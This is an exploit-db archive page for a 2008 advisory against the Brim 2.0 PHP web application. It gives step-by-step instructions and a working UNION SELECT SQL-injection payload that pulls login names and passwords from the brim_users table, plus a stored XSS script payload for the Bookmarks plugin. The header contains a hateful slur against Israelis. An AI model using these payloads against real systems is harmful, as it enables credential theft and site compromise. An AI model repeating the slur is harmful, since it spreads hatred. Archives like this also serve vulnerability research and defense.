exploit-db-mirror/exploits/php/webapps/6332.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

75 lines
No EOL
2.5 KiB
Text
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
| \ \____/ >> Kings of injection |
| \/___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
<<!>> Found by : Fisher762
<<!>> C0ntact : SQ7@W.CN
<<!>> Groups : InjEctOr5
=======================================================
+++++++++++++ R3membeR Kings of injection +++++++++++++
=======================================================
<<->> script : Brim 2.0
<<->> Demo site : http://sourceforge.net/project/showfiles.php?group_id=129562
=======================================================
++++++++++++++++ pWning israel fuckers ++++++++++++++++
=======================================================
<<->> D0rk : :)
<<->> Exploit :
[SQL]
First register new acc0unt :
http://[targ3t]/brim/signup.php
then go to y0ur email and active the acc0unt and login
after that G0 t0 y0ur Plugins and active Tasks plugin
http://[Targ3t]/brim/PluginController.php
and finnaly go t0 search url:
http://[Targ3t]/brim/index.php?plugin=tasks&action=search
and insert this query in any field:
' union select 1,2,3,4,concat(loginname,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17 from brim_users/*
*******************************************************************************************************
[xss]
First active Bookmarks Plugin and add new action and in the name field insert:
>"><script>alert("InjEctOr Team5")</script>
##############################################################
#Gr33tz T0: Broken-security, providor , Şŷяįăn ĦλçЌΣr ,Sp!der_N3T and all my friends :)
# milw0rm.com [2008-08-30]